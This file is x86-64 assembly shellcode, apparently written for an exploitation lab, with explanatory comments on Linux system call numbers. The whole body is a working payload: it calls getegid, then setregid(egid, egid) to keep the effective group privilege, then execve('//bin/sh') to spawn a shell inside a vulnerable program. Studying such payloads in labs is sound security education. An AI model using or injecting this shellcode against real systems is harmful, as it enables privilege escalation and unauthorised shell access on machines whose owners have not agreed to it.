#include <sys/syscall.h>

.globl  main
.type   main, @function

main:
  /*
      Objective:
        Calling three functions.

        int egid = getegid();
        setregid(egid, egid);
        execve("/bin/sh", 0, 0);
  */

  /*
    For 64bit:

    Check the system call numbers at here:
    http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/

    $SYS_getegid == 108
    $SYS_setregid == 114
    $SYS_execve == 59

    // run syscall
    1. set %rax as the target system call number (e.g., for getegid, it's 108).
    2. set arguments to %rdi (1st), %rsi (2nd), %rdx (3rd), %rcx (4th), %r8 (5)
    3. run 'syscall'  <-- an instruction available in 64 bit...

    // building "//bin/sh" on the stack
    amd64:
      mov $0x68732f6e69622f2f, %rbx // rbx: //bin/sh
      push $0                       // mark the end as 00 00 00 00 00 00 00 00
      push %rbx                     // push //bin/sh
                                    // So, it is "//bin/sh"

  */


    // run ret = getegid()
    push $SYS_getegid
    pop %rax
    syscall

    // run setregid(ret, ret);

    mov %rax, %rsi
    mov %rax, %rdi

    push $SYS_setregid
    pop %rax
    syscall

    // execve("//bin/sh", 0, 0)
    xor %rsi, %rsi
    xor %rdx, %rdx
    push $SYS_execve
    pop %rax


    mov $0x68732f6e69622f2f, %rbx // rbx: //bin/sh
    //  push $0                       // mark the end as 00 00 00 00 00 00 00 00
    //  push %rbx                     // push //bin/sh
    // execve("//bin/sh", 0, 0)
    push %rsi                       // mark the end as 00 00 00 00 00 00 00 00
    push %rbx                     // push //bin/sh

    mov %rsp, %rdi

    syscall

